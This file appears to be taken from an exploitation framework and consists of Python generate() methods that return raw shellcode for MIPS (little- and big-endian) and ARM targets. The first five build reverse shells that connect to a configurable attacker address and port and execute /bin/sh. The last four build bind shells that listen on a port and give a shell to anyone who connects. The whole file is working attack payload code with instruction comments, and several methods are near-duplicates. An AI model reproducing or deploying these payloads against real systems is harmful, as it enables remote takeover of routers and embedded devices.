def generate(self):
reverse_ip = validators.convert_ip(self.lhost)
reverse_port = validators.convert_port(self.lport)
return (
"\xff\xff\x04\x28" + # slti a0,zero,-1
"\xa6\x0f\x02\x24" + # li v0,4006
"\x0c\x09\x09\x01" + # syscall 0x42424
"\x11\x11\x04\x28" + # slti a0,zero,4369
"\xa6\x0f\x02\x24" + # li v0,4006
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xfd\xff\x0c\x24" + # li t4,-3
"\x27\x20\x80\x01" + # nor a0,t4,zero
"\xa6\x0f\x02\x24" + # li v0,4006
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xfd\xff\x0c\x24" + # li t4,-3
"\x27\x20\x80\x01" + # nor a0,t4,zero
"\x27\x28\x80\x01" + # nor a1,t4,zero
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x57\x10\x02\x24" + # li v0,4183
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xff\xff\x44\x30" + # andi a0,v0,0xffff
"\xc9\x0f\x02\x24" + # li v0,4041
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xc9\x0f\x02\x24" + # li v0,4041
"\x0c\x09\x09\x01" + # syscall 0x42424
reverse_port + "\x05\x3c" + # "\x7a\x69" lui a1,0x697a
"\x02\x00\xa5\x34" + # ori a1,a1,0x2
"\xf8\xff\xa5\xaf" + # sw a1,-8(sp)
reverse_ip[2:] + "\x05\x3c" + # "\x00\x01" lui a1,0x100
reverse_ip[:2] + "\xa5\x34" + # "\x7f\x00" ori a1,a1,0x7f
"\xfc\xff\xa5\xaf" + # sw a1,-4(sp)
"\xf8\xff\xa5\x23" + # addi a1,sp,-8
"\xef\xff\x0c\x24" + # li t4,-17
"\x27\x30\x80\x01" + # nor a2,t4,zero
"\x4a\x10\x02\x24" + # li v0,4170
"\x0c\x09\x09\x01" + # syscall 0x42424
"\x62\x69\x08\x3c" + # lui t0,0x6962
"\x2f\x2f\x08\x35" + # ori t0,t0,0x2f2f
"\xec\xff\xa8\xaf" + # sw t0,-20(sp)
"\x73\x68\x08\x3c" + # lui t0,0x6873
"\x6e\x2f\x08\x35" + # ori t0,t0,0x2f6e
"\xf0\xff\xa8\xaf" + # sw t0,-16(sp)
"\xff\xff\x07\x28" + # slti a3,zero,-1
"\xf4\xff\xa7\xaf" + # sw a3,-12(sp)
"\xfc\xff\xa7\xaf" + # sw a3,-4(sp)
"\xec\xff\xa4\x23" + # addi a0,sp,-20
"\xec\xff\xa8\x23" + # addi t0,sp,-20
"\xf8\xff\xa8\xaf" + # sw t0,-8(sp)
"\xf8\xff\xa5\x23" + # addi a1,sp,-8
"\xec\xff\xbd\x27" + # addiu sp,sp,-20
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\xab\x0f\x02\x24" + # li v0,4011
"\x0c\x09\x09\x01" # syscall 0x42424
)
def generate(self):
reverse_ip = validators.convert_ip(self.lhost)
reverse_port = validators.convert_port(self.lport)
return (
"\x28\x04\xff\xff" + # slti a0,zero,-1
"\x24\x02\x0f\xa6" + # li v0,4006
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x28\x04\x11\x11" + # slti a0,zero,4369
"\x24\x02\x0f\xa6" + # li v0,4006
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x24\x0c\xff\xfd" + # li t4,-3
"\x01\x80\x20\x27" + # nor a0,t4,zero
"\x24\x02\x0f\xa6" + # li v0,4006
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x24\x0c\xff\xfd" + # li t4,-3
"\x01\x80\x20\x27" + # nor a0,t4,zero
"\x01\x80\x28\x27" + # nor a1,t4,zero
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x24\x02\x10\x57" + # li v0,4183
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x30\x44\xff\xff" + # andi a0,v0,0xffff
"\x24\x02\x0f\xc9" + # li v0,4041
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x24\x02\x0f\xc9" + # li v0,4041
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x3c\x05\x00\x02" + # lui a1,0x2
"\x34\xa5" + reverse_port + # "\x7a\x69" # ori a1,a1,0x7a69
"\xaf\xa5\xff\xf8" + # sw a1,-8(sp)
"\x3c\x05" + reverse_ip[:2] + # "\xc0\xa8" # lui a1,0xc0a8
"\x34\xa5" + reverse_ip[2:] + # "\x01\x37" # ori a1,a1,0x137
"\xaf\xa5\xff\xfc" + # sw a1,-4(sp)
"\x23\xa5\xff\xf8" + # addi a1,sp,-8
"\x24\x0c\xff\xef" + # li t4,-17
"\x01\x80\x30\x27" + # nor a2,t4,zero
"\x24\x02\x10\x4a" + # li v0,4170
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x3c\x08\x2f\x2f" + # lui t0,0x2f2f
"\x35\x08\x62\x69" + # ori t0,t0,0x6269
"\xaf\xa8\xff\xec" + # sw t0,-20(sp)
"\x3c\x08\x6e\x2f" + # lui t0,0x6e2f
"\x35\x08\x73\x68" + # ori t0,t0,0x7368
"\xaf\xa8\xff\xf0" + # sw t0,-16(sp)
"\x28\x07\xff\xff" + # slti a3,zero,-1
"\xaf\xa7\xff\xf4" + # sw a3,-12(sp)
"\xaf\xa7\xff\xfc" + # sw a3,-4(sp)
"\x23\xa4\xff\xec" + # addi a0,sp,-20
"\x23\xa8\xff\xec" + # addi t0,sp,-20
"\xaf\xa8\xff\xf8" + # sw t0,-8(sp)
"\x23\xa5\xff\xf8" + # addi a1,sp,-8
"\x27\xbd\xff\xec" + # addiu sp,sp,-20
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x24\x02\x0f\xab" + # li v0,4011
"\x00\x90\x93\x4c" # syscall 0x2424d
)
def generate(self):
reverse_ip = validators.convert_ip(self.lhost)
reverse_port = validators.convert_port(self.lport)
return ("\x28\x04\xff\xff" + # slti a0,zero,-1
"\x24\x02\x0f\xa6" + # li v0,4006
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x28\x04\x11\x11" + # slti a0,zero,4369
"\x24\x02\x0f\xa6" + # li v0,4006
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x24\x0c\xff\xfd" + # li t4,-3
"\x01\x80\x20\x27" + # nor a0,t4,zero
"\x24\x02\x0f\xa6" + # li v0,4006
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x24\x0c\xff\xfd" + # li t4,-3
"\x01\x80\x20\x27" + # nor a0,t4,zero
"\x01\x80\x28\x27" + # nor a1,t4,zero
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x24\x02\x10\x57" + # li v0,4183
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x30\x44\xff\xff" + # andi a0,v0,0xffff
"\x24\x02\x0f\xc9" + # li v0,4041
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x24\x02\x0f\xc9" + # li v0,4041
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x3c\x05\x00\x02" + # lui a1,0x2
"\x34\xa5" + reverse_port + # "\x7a\x69" # ori a1,a1,0x7a69
"\xaf\xa5\xff\xf8" + # sw a1,-8(sp)
"\x3c\x05" + reverse_ip[:2] + # "\xc0\xa8" # lui a1,0xc0a8
"\x34\xa5" +
reverse_ip[2:] + # "\x01\x37" # ori a1,a1,0x137
"\xaf\xa5\xff\xfc" + # sw a1,-4(sp)
"\x23\xa5\xff\xf8" + # addi a1,sp,-8
"\x24\x0c\xff\xef" + # li t4,-17
"\x01\x80\x30\x27" + # nor a2,t4,zero
"\x24\x02\x10\x4a" + # li v0,4170
"\x01\x09\x09\x0c" + # syscall 0x42424
"\x3c\x08\x2f\x2f" + # lui t0,0x2f2f
"\x35\x08\x62\x69" + # ori t0,t0,0x6269
"\xaf\xa8\xff\xec" + # sw t0,-20(sp)
"\x3c\x08\x6e\x2f" + # lui t0,0x6e2f
"\x35\x08\x73\x68" + # ori t0,t0,0x7368
"\xaf\xa8\xff\xf0" + # sw t0,-16(sp)
"\x28\x07\xff\xff" + # slti a3,zero,-1
"\xaf\xa7\xff\xf4" + # sw a3,-12(sp)
"\xaf\xa7\xff\xfc" + # sw a3,-4(sp)
"\x23\xa4\xff\xec" + # addi a0,sp,-20
"\x23\xa8\xff\xec" + # addi t0,sp,-20
"\xaf\xa8\xff\xf8" + # sw t0,-8(sp)
"\x23\xa5\xff\xf8" + # addi a1,sp,-8
"\x27\xbd\xff\xec" + # addiu sp,sp,-20
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x24\x02\x0f\xab" + # li v0,4011
"\x00\x90\x93\x4c" # syscall 0x2424d
)
def generate(self):
reverse_ip = validators.convert_ip(self.lhost)
reverse_port = validators.convert_port(self.lport)
return ("\xff\xff\x04\x28" + # slti a0,zero,-1
"\xa6\x0f\x02\x24" + # li v0,4006
"\x0c\x09\x09\x01" + # syscall 0x42424
"\x11\x11\x04\x28" + # slti a0,zero,4369
"\xa6\x0f\x02\x24" + # li v0,4006
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xfd\xff\x0c\x24" + # li t4,-3
"\x27\x20\x80\x01" + # nor a0,t4,zero
"\xa6\x0f\x02\x24" + # li v0,4006
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xfd\xff\x0c\x24" + # li t4,-3
"\x27\x20\x80\x01" + # nor a0,t4,zero
"\x27\x28\x80\x01" + # nor a1,t4,zero
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x57\x10\x02\x24" + # li v0,4183
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xff\xff\x44\x30" + # andi a0,v0,0xffff
"\xc9\x0f\x02\x24" + # li v0,4041
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xc9\x0f\x02\x24" + # li v0,4041
"\x0c\x09\x09\x01" + # syscall 0x42424
reverse_port + "\x05\x3c" + # "\x7a\x69" lui a1,0x697a
"\x02\x00\xa5\x34" + # ori a1,a1,0x2
"\xf8\xff\xa5\xaf" + # sw a1,-8(sp)
reverse_ip[2:] + "\x05\x3c" + # "\x00\x01" lui a1,0x100
reverse_ip[:2] + "\xa5\x34" + # "\x7f\x00" ori a1,a1,0x7f
"\xfc\xff\xa5\xaf" + # sw a1,-4(sp)
"\xf8\xff\xa5\x23" + # addi a1,sp,-8
"\xef\xff\x0c\x24" + # li t4,-17
"\x27\x30\x80\x01" + # nor a2,t4,zero
"\x4a\x10\x02\x24" + # li v0,4170
"\x0c\x09\x09\x01" + # syscall 0x42424
"\x62\x69\x08\x3c" + # lui t0,0x6962
"\x2f\x2f\x08\x35" + # ori t0,t0,0x2f2f
"\xec\xff\xa8\xaf" + # sw t0,-20(sp)
"\x73\x68\x08\x3c" + # lui t0,0x6873
"\x6e\x2f\x08\x35" + # ori t0,t0,0x2f6e
"\xf0\xff\xa8\xaf" + # sw t0,-16(sp)
"\xff\xff\x07\x28" + # slti a3,zero,-1
"\xf4\xff\xa7\xaf" + # sw a3,-12(sp)
"\xfc\xff\xa7\xaf" + # sw a3,-4(sp)
"\xec\xff\xa4\x23" + # addi a0,sp,-20
"\xec\xff\xa8\x23" + # addi t0,sp,-20
"\xf8\xff\xa8\xaf" + # sw t0,-8(sp)
"\xf8\xff\xa5\x23" + # addi a1,sp,-8
"\xec\xff\xbd\x27" + # addiu sp,sp,-20
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\xab\x0f\x02\x24" + # li v0,4011
"\x0c\x09\x09\x01" # syscall 0x42424
)
def generate(self):
reverse_ip = validators.convert_ip(self.lhost)
reverse_port = validators.convert_port(self.lport)
return (
"\x01\x10\x8F\xE2" +
"\x11\xFF\x2F\xE1" +
"\x02\x20\x01\x21" +
"\x92\x1A\x0F\x02" +
"\x19\x37\x01\xDF" +
"\x06\x1C\x08\xA1" +
"\x10\x22\x02\x37" +
"\x01\xDF\x3F\x27" +
"\x02\x21\x30\x1c" +
"\x01\xdf\x01\x39" +
"\xFB\xD5\x05\xA0" +
"\x92\x1a\x05\xb4" +
"\x69\x46\x0b\x27" +
"\x01\xDF\xC0\x46" +
"\x02\x00" + reverse_port + # "\x12\x34" struct sockaddr and port
reverse_ip + # reverse ip address
"\x2f\x62\x69\x6e" + # /bin
"\x2f\x73\x68\x00" # /sh\0
)
def generate(self):
bind_port = validators.convert_port(self.rport)
return ("\x02\x00\xa0\xe3" + "\x01\x10\xa0\xe3" + "\x06\x20\xa0\xe3" +
"\x07\x00\x2d\xe9" + "\x01\x00\xa0\xe3" + "\x0d\x10\xa0\xe1" +
"\x66\x00\x90\xef" + "\x0c\xd0\x8d\xe2" + "\x00\x60\xa0\xe1" +
bind_port[1] + "\x10\xa0\xe3" + bind_port[0] + "\x70\xa0\xe3" +
"\x01\x1c\xa0\xe1" + "\x07\x18\x81\xe0" + "\x02\x10\x81\xe2" +
"\x02\x20\x42\xe0" + "\x06\x00\x2d\xe9" + "\x0d\x10\xa0\xe1" +
"\x10\x20\xa0\xe3" + "\x07\x00\x2d\xe9" + "\x02\x00\xa0\xe3" +
"\x0d\x10\xa0\xe1" + "\x66\x00\x90\xef" + "\x14\xd0\x8d\xe2" +
"\x06\x00\xa0\xe1" + "\x03\x00\x2d\xe9" + "\x04\x00\xa0\xe3" +
"\x0d\x10\xa0\xe1" + "\x66\x00\x90\xef" + "\x08\xd0\x8d\xe2" +
"\x06\x00\xa0\xe1" + "\x01\x10\x41\xe0" + "\x02\x20\x42\xe0" +
"\x07\x00\x2d\xe9" + "\x05\x00\xa0\xe3" + "\x0d\x10\xa0\xe1" +
"\x66\x00\x90\xef" + "\x0c\xd0\x8d\xe2" + "\x00\x60\xa0\xe1" +
"\x02\x10\xa0\xe3" + "\x06\x00\xa0\xe1" + "\x3f\x00\x90\xef" +
"\x01\x10\x51\xe2" + "\xfb\xff\xff\x5a" + "\x04\x10\x4d\xe2" +
"\x02\x20\x42\xe0" + "\x2f\x30\xa0\xe3" + "\x62\x70\xa0\xe3" +
"\x07\x34\x83\xe0" + "\x69\x70\xa0\xe3" + "\x07\x38\x83\xe0" +
"\x6e\x70\xa0\xe3" + "\x07\x3c\x83\xe0" + "\x2f\x40\xa0\xe3" +
"\x73\x70\xa0\xe3" + "\x07\x44\x84\xe0" + "\x68\x70\xa0\xe3" +
"\x07\x48\x84\xe0" + "\x73\x50\xa0\xe3" + "\x68\x70\xa0\xe3" +
"\x07\x54\x85\xe0" + "\x3e\x00\x2d\xe9" + "\x08\x00\x8d\xe2" +
"\x00\x10\x8d\xe2" + "\x04\x20\x8d\xe2" + "\x0b\x00\x90\xef")
def generate(self):
bind_port = validators.convert_port(self.lport)
return (
"\xe0\xff\xbd\x27" + # addiu sp,sp,-32
"\xfd\xff\x0e\x24" + # li t6,-3
"\x27\x20\xc0\x01" + # nor a0,t6,zero
"\x27\x28\xc0\x01" + # nor a1,t6,zero
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x57\x10\x02\x24" + # li v0,4183 ( __NR_socket )
"\x0c\x01\x01\x01" + # syscall
"\xff\xff\x50\x30" + # andi s0,v0,0xffff
"\xef\xff\x0e\x24" + # li t6,-17 ; t6: 0xffffffef
"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x10 (16)
bind_port + "\x0d\x24" + # li t5,0xFFFF (port) ; t5: 0x5c11 (0x115c == 4444 (default LPORT))
"\x04\x68\xcd\x01" + # sllv t5,t5,t6 ; t5: 0x5c110000
"\xfd\xff\x0e\x24" + # li t6,-3 ; t6: -3
"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x2
"\x25\x68\xae\x01" + # or t5,t5,t6 ; t5: 0x5c110002
"\xe0\xff\xad\xaf" + # sw t5,-32(sp)
"\xe4\xff\xa0\xaf" + # sw zero,-28(sp)
"\xe8\xff\xa0\xaf" + # sw zero,-24(sp)
"\xec\xff\xa0\xaf" + # sw zero,-20(sp)
"\x25\x20\x10\x02" + # or a0,s0,s0
"\xef\xff\x0e\x24" + # li t6,-17
"\x27\x30\xc0\x01" + # nor a2,t6,zero
"\xe0\xff\xa5\x23" + # addi a1,sp,-32
"\x49\x10\x02\x24" + # li v0,4169 ( __NR_bind )A
"\x0c\x01\x01\x01" + # syscall
"\x25\x20\x10\x02" + # or a0,s0,s0
"\x01\x01\x05\x24" + # li a1,257
"\x4e\x10\x02\x24" + # li v0,4174 ( __NR_listen )
"\x0c\x01\x01\x01" + # syscall
"\x25\x20\x10\x02" + # or a0,s0,s0
"\xff\xff\x05\x28" + # slti a1,zero,-1
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x48\x10\x02\x24" + # li v0,4168 ( __NR_accept )
"\x0c\x01\x01\x01" + # syscall
"\xff\xff\xa2\xaf" + # sw v0,-1(sp) # socket
"\xfd\xff\x11\x24" + # li s1,-3
"\x27\x88\x20\x02" + # nor s1,s1,zero
"\xff\xff\xa4\x8f" + # lw a0,-1(sp)
"\x21\x28\x20\x02" + # move a1,s1 # dup2_loop
"\xdf\x0f\x02\x24" + # li v0,4063 ( __NR_dup2 )
"\x0c\x01\x01\x01" + # syscall 0x40404
"\xff\xff\x10\x24" + # li s0,-1
"\xff\xff\x31\x22" + # addi s1,s1,-1
"\xfa\xff\x30\x16" + # bne s1,s0 <dup2_loop>
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi"
"\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//"
"\xec\xff\xaf\xaf" + # sw t7,-20(sp)
"\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh"
"\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/"
"\xf0\xff\xae\xaf" + # sw t6,-16(sp)
"\xf4\xff\xa0\xaf" + # sw zero,-12(sp)
"\xec\xff\xa4\x27" + # addiu a0,sp,-20
"\xf8\xff\xa4\xaf" + # sw a0,-8(sp)
"\xfc\xff\xa0\xaf" + # sw zero,-4(sp)
"\xf8\xff\xa5\x27" + # addiu a1,sp,-8
"\xab\x0f\x02\x24" + # li v0,4011 ( __NR_execve )
"\x0c\x01\x01\x01" # syscall 0x40404
)
def generate(self):
bind_port = validators.convert_port(self.rport)
return (
"\xe0\xff\xbd\x27" + # addiu sp,sp,-32
"\xfd\xff\x0e\x24" + # li t6,-3
"\x27\x20\xc0\x01" + # nor a0,t6,zero
"\x27\x28\xc0\x01" + # nor a1,t6,zero
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x57\x10\x02\x24" + # li v0,4183 ( __NR_socket )
"\x0c\x01\x01\x01" + # syscall
"\xff\xff\x50\x30" + # andi s0,v0,0xffff
"\xef\xff\x0e\x24" + # li t6,-17 ; t6: 0xffffffef
"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x10 (16)
bind_port + "\x0d\x24" + # li t5,0xFFFF (port) ; t5: 0x5c11 (0x115c == 4444 (default LPORT))
"\x04\x68\xcd\x01" + # sllv t5,t5,t6 ; t5: 0x5c110000
"\xfd\xff\x0e\x24" + # li t6,-3 ; t6: -3
"\x27\x70\xc0\x01" + # nor t6,t6,zero ; t6: 0x2
"\x25\x68\xae\x01" + # or t5,t5,t6 ; t5: 0x5c110002
"\xe0\xff\xad\xaf" + # sw t5,-32(sp)
"\xe4\xff\xa0\xaf" + # sw zero,-28(sp)
"\xe8\xff\xa0\xaf" + # sw zero,-24(sp)
"\xec\xff\xa0\xaf" + # sw zero,-20(sp)
"\x25\x20\x10\x02" + # or a0,s0,s0
"\xef\xff\x0e\x24" + # li t6,-17
"\x27\x30\xc0\x01" + # nor a2,t6,zero
"\xe0\xff\xa5\x23" + # addi a1,sp,-32
"\x49\x10\x02\x24" + # li v0,4169 ( __NR_bind )A
"\x0c\x01\x01\x01" + # syscall
"\x25\x20\x10\x02" + # or a0,s0,s0
"\x01\x01\x05\x24" + # li a1,257
"\x4e\x10\x02\x24" + # li v0,4174 ( __NR_listen )
"\x0c\x01\x01\x01" + # syscall
"\x25\x20\x10\x02" + # or a0,s0,s0
"\xff\xff\x05\x28" + # slti a1,zero,-1
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x48\x10\x02\x24" + # li v0,4168 ( __NR_accept )
"\x0c\x01\x01\x01" + # syscall
"\xff\xff\xa2\xaf" + # sw v0,-1(sp) # socket
"\xfd\xff\x11\x24" + # li s1,-3
"\x27\x88\x20\x02" + # nor s1,s1,zero
"\xff\xff\xa4\x8f" + # lw a0,-1(sp)
"\x21\x28\x20\x02" + # move a1,s1 # dup2_loop
"\xdf\x0f\x02\x24" + # li v0,4063 ( __NR_dup2 )
"\x0c\x01\x01\x01" + # syscall 0x40404
"\xff\xff\x10\x24" + # li s0,-1
"\xff\xff\x31\x22" + # addi s1,s1,-1
"\xfa\xff\x30\x16" + # bne s1,s0 <dup2_loop>
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi"
"\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//"
"\xec\xff\xaf\xaf" + # sw t7,-20(sp)
"\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh"
"\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/"
"\xf0\xff\xae\xaf" + # sw t6,-16(sp)
"\xf4\xff\xa0\xaf" + # sw zero,-12(sp)
"\xec\xff\xa4\x27" + # addiu a0,sp,-20
"\xf8\xff\xa4\xaf" + # sw a0,-8(sp)
"\xfc\xff\xa0\xaf" + # sw zero,-4(sp)
"\xf8\xff\xa5\x27" + # addiu a1,sp,-8
"\xab\x0f\x02\x24" + # li v0,4011 ( __NR_execve )
"\x0c\x01\x01\x01" # syscall 0x40404
)
def generate(self):
bind_port = validators.convert_port(self.rport)
return (
# socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
"\x27\xbd\xff\xe0" + # addiu sp,sp,-32
"\x24\x0e\xff\xfd" + # li t6,-3
"\x01\xc0\x20\x27" + # nor a0,t6,zero
"\x01\xc0\x28\x27" + # nor a1,t6,zero
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x24\x02\x10\x57" + # li v0,4183 ( __NR_socket )
"\x01\x01\x01\x0c" + # syscall
# bind(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
"\x30\x50\xff\xff" + # andi s0,v0,0xffff
"\x24\x0e\xff\xef"
+ # li t6,-17 ; t6: 0xffffffef
"\x01\xc0\x70\x27"
+ # nor t6,t6,zero ; t6: 0x10 (16)
"\x24\x0d\xff\xfd"
+ # li t5,-3 ; t5: -3
"\x01\xa0\x68\x27"
+ # nor t5,t5,zero ; t5: 0x2
"\x01\xcd\x68\x04"
+ # sllv t5,t5,t6 ; t5: 0x00020000
"\x24\x0e" + bind_port
+ # li t6,0xFFFF (port) ; t6: 0x115c (4444 (default LPORT))
"\x01\xae\x68\x25"
+ # or t5,t5,t6 ; t5: 0x0002115c
"\xaf\xad\xff\xe0" + # sw t5,-32(sp)
"\xaf\xa0\xff\xe4" + # sw zero,-28(sp)
"\xaf\xa0\xff\xe8" + # sw zero,-24(sp)
"\xaf\xa0\xff\xec" + # sw zero,-20(sp)
"\x02\x10\x20\x25" + # or a0,s0,s0
"\x24\x0e\xff\xef" + # li t6,-17
"\x01\xc0\x30\x27" + # nor a2,t6,zero
"\x23\xa5\xff\xe0" + # addi a1,sp,-32
"\x24\x02\x10\x49" + # li v0,4169 ( __NR_bind )A
"\x01\x01\x01\x0c" + # syscall
# listen(3, 257) = 0
"\x02\x10\x20\x25" + # or a0,s0,s0
"\x24\x05\x01\x01" + # li a1,257
"\x24\x02\x10\x4e" + # li v0,4174 ( __NR_listen )
"\x01\x01\x01\x0c" + # syscall
# accept(3, 0, NULL) = 4
"\x02\x10\x20\x25" + # or a0,s0,s0
"\x28\x05\xff\xff" + # slti a1,zero,-1
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x24\x02\x10\x48" + # li v0,4168 ( __NR_accept )
"\x01\x01\x01\x0c" + # syscall
# dup2(4, 2) = 2
# dup2(4, 1) = 1
# dup2(4, 0) = 0
"\xaf\xa2\xff\xff" + # sw v0,-1(sp) # socket
"\x24\x11\xff\xfd" + # li s1,-3
"\x02\x20\x88\x27" + # nor s1,s1,zero
"\x8f\xa4\xff\xff" + # lw a0,-1(sp)
"\x02\x20\x28\x21" + # move a1,s1 # dup2_loop
"\x24\x02\x0f\xdf" + # li v0,4063 ( __NR_dup2 )
"\x01\x01\x01\x0c" + # syscall 0x40404
"\x24\x10\xff\xff" + # li s0,-1
"\x22\x31\xff\xff" + # addi s1,s1,-1
"\x16\x30\xff\xfa" + # bne s1,s0 <dup2_loop>
# execve("//bin/sh", ["//bin/sh"], [/* 0 vars */]) = 0
"\x28\x06\xff\xff" + # slti a2,zero,-1
"\x3c\x0f\x2f\x2f" + # lui t7,0x2f2f "//"
"\x35\xef\x62\x69" + # ori t7,t7,0x6269 "bi"
"\xaf\xaf\xff\xec" + # sw t7,-20(sp)
"\x3c\x0e\x6e\x2f" + # lui t6,0x6e2f "n/"
"\x35\xce\x73\x68" + # ori t6,t6,0x7368 "sh"
"\xaf\xae\xff\xf0" + # sw t6,-16(sp)
"\xaf\xa0\xff\xf4" + # sw zero,-12(sp)
"\x27\xa4\xff\xec" + # addiu a0,sp,-20
"\xaf\xa4\xff\xf8" + # sw a0,-8(sp)
"\xaf\xa0\xff\xfc" + # sw zero,-4(sp)
"\x27\xa5\xff\xf8" + # addiu a1,sp,-8
"\x24\x02\x0f\xab" + # li v0,4011 ( __NR_execve )
"\x01\x01\x01\x0c" # syscall 0x40404
)